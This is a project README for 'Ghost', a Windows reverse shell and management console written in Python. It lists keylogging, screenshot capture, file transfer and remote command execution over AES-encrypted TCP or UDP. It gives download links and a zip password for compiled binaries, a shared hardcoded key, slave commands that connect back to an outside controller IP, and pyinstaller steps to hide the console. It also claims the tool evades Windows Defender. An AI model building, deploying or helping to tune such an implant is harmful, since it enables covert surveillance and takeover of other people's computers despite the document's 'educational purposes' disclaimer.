Ghost

Reverse shell and management console for Windows. Communication between the reverse shell and the management console is AES encrypted. Reverse shell and management console support tcp and udp protocols.

Some of its features are

-Sends commands to cmd and powershell,

-Creates or extracts zip files

-Downloads files from the Internet,

-Supports file upload and download,

-Creates keylogger program,

-Takes a screenshot

-Communication between server and client is AES encrypted.

The Compiled Version of the Program Can be Downloaded from the Links Below.

1) Compiled without using the "--noconsole" command

ghost_v4_showconsole.rar --> zip password: "ghost_v4"

Link = https://drive.google.com/file/d/1d_8ghw7vlULQ26KI1hbJaTmT_d3QQY8W/view?usp=sharing

2) Compiled using the "--noconsole" command

ghost_v4_noconsole.rar --> zip password: "ghost_v4"

Link = https://drive.google.com/file/d/1Oxeva5fwwTeRRJLv_7o12Lby4AXeFnEq/view?usp=sharing

Requirements

Required libraries: pycryptodome , requests, pyautogui, pyinstaller

pip install pycryptodome
pip install  requests
pip install pyautogui
pip install pyinstaller

"pyinstaller" will be used to make the code one piece executable

Settings

(1) master.py

    CRTYPTO_KEY     =  b'A45iPxLo908RYe3Wq034TueWvCxz3618'      # 32 bit(s) AES key  (changeable) [The value for "slave.py" should be the same.]
    CRTYPTO_NUMBER  =  71                                       # Second key to strengthen encryption. It must be between 1 and 128. (changeable) [The value for "slave.py" should be the same.]
    SOCKET_PROTOCOL = "UDP"                                     # "TCP" or "UDP" (changeable)
    SOCKET_HOST     = "0.0.0.0"                                 # This value in "master.py" should not be changed in order for "slave.py" to be connected.
    SOCKET_PORT     = 9292                                      # "slave.py" must be the same port. (changeable)
    SYSTEM_ENCODE   = "cp857"                                   # TURKISH CHARACTER SET (changeable; example utf-8, latin1 etc.)
    SYSTEM_DEFAULTTIMEOUT = 0                                   # No timeout. It is recommended to set the value to "0" for master.py.

(2) slave.py

    CRTYPTO_KEY     =  b'A45iPxLo908RYe3Wq034TueWvCxz3618'      # 32 bit(s) AES key  (changeable) [The value for "slave.py" should be the same.]
    CRTYPTO_NUMBER  =  71                                       # Second key to strengthen encryption. It must be between 1 and 128. (changeable) [The value for "slave.py" should be the same.]
    SOCKET_PROTOCOL = "UDP"                                     # "TCP" or "UDP" (changeable)
    SOCKET_HOST     = "127.0.0.1"                               # The IP to which "slave.py" will be connected
    SOCKET_PORT     = 9292                                      # "master.py" must be the same port. (changeable)
    SYSTEM_ENCODE   = "cp857"                                   # TURKISH CHARACTER SET (changeable; example utf-8, latin1 etc.)
    SYSTEM_DEFAULTTIMEOUT = 300                                 # 5 minutes; It is recommended to be non-zero for "UDP". When the connection is lost or an error occurs, "slave.py" tries to connect again after this period. At the same time, if it does not receive a command from "master.py" within this time, it tries to connect again. Therefore, setting a very low value is also not appropriate.

Except for encryption, these values can be changed with initial parameters if desired.

master.exe -h ==> Shows help parameters.

slave -h ==> Not shows help parameters because of the parameter ("--noconsole") used while compiling

Example:

master -udp -c:cp857 -t:00 8080 ==> (8080 port)

master -tcp -c:utf-8 -t:600 9393 ==> (9393 port)

master 7272 ==> (7272 port)

slave -udp -c:cp857 -t:600 1.1.1.1:8080 ==> (1.1.1.1 ip - 8080 port)

slave -tcp -c:utf-8 -t:00 1.1.1.1:9393 ==> (1.1.1.1 ip - 9393 port)

slave 3.3.3.3:7272 ==> (3.3.3.3 ip - 7272 port)

Compilation

[Language : Python 3.8.5]

(show console for slave.py)

pyinstaller --onefile --icon=master.ico master.py

pyinstaller --onefile --icon=slave.ico slave.py

or (hide console for slave.py)

pyinstaller --onefile --icon=master.ico master.py

pyinstaller --onefile --noconsole --icon=slave.ico slave.py

Commands for Master.py

commands # Shows commands very briefly.

help # Shows commands in detail.

Notes

First, master.py should be run, then slave.py should be run. Otherwise, slave.py will wait for the timeout and try to connect again.

Some Images of the Working of the Program

[1]

[2]

[3]

[4]

[5]

[6]

[7]

[8]

Windows Defender

As of 10/04/2022, it is not caught by the Windows Defender program. Over time this will change.

Legal Warning

Run your tests on virtual machines. The responsibility for illegal use belongs to the user. Shared for educational purposes.